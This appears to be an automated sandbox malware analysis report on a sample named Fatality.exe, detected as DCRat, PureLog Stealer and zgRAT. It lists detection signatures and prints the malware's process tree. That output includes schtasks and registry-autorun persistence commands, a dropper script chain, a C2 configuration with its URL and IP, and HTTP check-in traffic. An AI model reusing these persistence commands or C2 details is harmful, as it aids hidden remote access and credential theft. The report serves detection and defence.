Windows Analysis Report
Fatality.exe

Overview

General Information

Sample name: Fatality.exe
Analysis ID: 1498676
MD5: a5a9cde94b59bc5b8b88d60fc28177d3
SHA1: aba15bc72cdeb915369b481926676f0a452d6dcc
SHA256: 4ddd25095cce5dadc01782611513331e9fb1e37746adc5501a5b27c2b7aecfa6
Tags: exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Fatality.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\Fatality.exe" MD5: A5A9CDE94B59BC5B8B88D60FC28177D3)
    • wscript.exe (PID: 5268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BridgeInto.exe (PID: 6828 cmdline: "C:\Bridgemonitor/BridgeInto.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
          • schtasks.exe (PID: 5164 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6596 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3420 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 5648 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5856 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 4032 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2348 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 416 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6708 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 6 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2704 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5052 cmdline: schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3908 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 528 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6332 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3420 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1924 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5076 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5388 cmdline: schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 10 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4508 cmdline: schtasks.exe /create /tn "BridgeInto" /sc ONLOGON /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5964 cmdline: schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 9 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4032 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6708 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5268 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • dllhost.exe (PID: 4188 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • dllhost.exe (PID: 6268 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • dllhost.exe (PID: 1424 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • BridgeInto.exe (PID: 4972 cmdline: C:\Bridgemonitor\BridgeInto.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • BridgeInto.exe (PID: 6904 cmdline: C:\Bridgemonitor\BridgeInto.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dllhost.exe (PID: 884 cmdline: C:\Recovery\dllhost.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dllhost.exe (PID: 4324 cmdline: C:\Recovery\dllhost.exe MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • cleanup
{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
Fatality.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
Fatality.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Bridgemonitor\BridgeInto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Bridgemonitor\BridgeInto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Bridgemonitor\BridgeInto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: BridgeInto.exe PID: 6828 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
6.0.BridgeInto.exe.840000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
6.0.BridgeInto.exe.840000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetFilename: C:\Recovery\dllhost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Recovery\dllhost.exe, CommandLine: C:\Recovery\dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dllhost.exe, NewProcessName: C:\Recovery\dllhost.exe, OriginalFileName: C:\Recovery\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Recovery\dllhost.exe, ProcessId: 884, ProcessName: dllhost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe", EventID: 13, EventType: SetValue, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EoNanmDGxPEtougVgAjHLx
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe", EventID: 13, EventType: SetValue, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Bridgemonitor/BridgeInto.exe", ParentImage: C:\Bridgemonitor\BridgeInto.exe, ParentProcessId: 6828, ParentProcessName: BridgeInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", ProcessId: 1908, ProcessName: csc.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Fatality.exe", ParentImage: C:\Users\user\Desktop\Fatality.exe, ParentProcessId: 4540, ParentProcessName: Fatality.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe" , ProcessId: 5268, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Bridgemonitor\BridgeInto.exe, ProcessId: 6828, TargetFilename: C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Bridgemonitor/BridgeInto.exe", ParentImage: C:\Bridgemonitor\BridgeInto.exe, ParentProcessId: 6828, ParentProcessName: BridgeInto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline", ProcessId: 1908, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f, CommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Bridgemonitor/BridgeInto.exe", ParentImage: C:\Bridgemonitor\BridgeInto.exe, ParentProcessId: 6828, ParentProcessName: BridgeInto.exe, ProcessCommandLine: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f, ProcessId: 3908, ProcessName: schtasks.exe

Timestamp: 2024-08-25T15:43:31.655901+0200
SID: 2048095
Severity: 1
Source Port: 49718
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Fatality.exe | Avira: detected
Source: http://373292cm.nyashka.top | Avira URL Cloud: Label: malware
Source: http://373292cm.nyashka.top/ | Avira URL Cloud: Label: malware
Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | Avira URL Cloud: Label: malware
Source: C:\ProgramData\ssh\WinStore.App.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\XAjYjGFx.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\vVSvSxGn.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Bridgemonitor\BridgeInto.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\pMLeDcaM.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Recovery\dllhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\LfISQjWH.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: 373292cm.nyashka.top | Virustotal: Detection: 18%
Source: C:\Bridgemonitor\BridgeInto.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | ReversingLabs: Detection: 100%
Source: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe | ReversingLabs: Detection: 100%
Source: C:\ProgramData\ssh\WinStore.App.exe | ReversingLabs: Detection: 100%
Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe | ReversingLabs: Detection: 100%
Source: C:\Recovery\dllhost.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\AqqubUji.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LfISQjWH.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\MMFizuKP.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\nKZvhtVR.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\pMLeDcaM.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\rfcELAFu.log | ReversingLabs: Detection: 29%
Source: Fatality.exe | ReversingLabs: Detection: 78%
Source: Fatality.exe | Virustotal: Detection: 84%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\ssh\WinStore.App.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EiwsPBui.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UXzikyum.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
Source: C:\Bridgemonitor\BridgeInto.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\pMLeDcaM.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe | Joe Sandbox ML: detected
Source: C:\Recovery\dllhost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LfISQjWH.log | Joe Sandbox ML: detected
Source: Fatality.exe | Joe Sandbox ML: detected
Source: Fatality.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Bridgemonitor\BridgeInto.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe
Source: C:\Bridgemonitor\BridgeInto.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\c917822ecb0d66
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Fatality.exe, Fatality.exe, 00000000.00000002.2133149827.0000000000891000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Bridgemonitor\BridgeInto.exe | File opened: C:\Users\user\AppData
Source: C:\Bridgemonitor\BridgeInto.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Bridgemonitor\BridgeInto.exe | File opened: C:\Users\user
Source: C:\Bridgemonitor\BridgeInto.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Bridgemonitor\BridgeInto.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Bridgemonitor\BridgeInto.exe | File opened: C:\Users\user\AppData\Local\Temp

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49718 -> 80.211.144.156:80
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                              Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
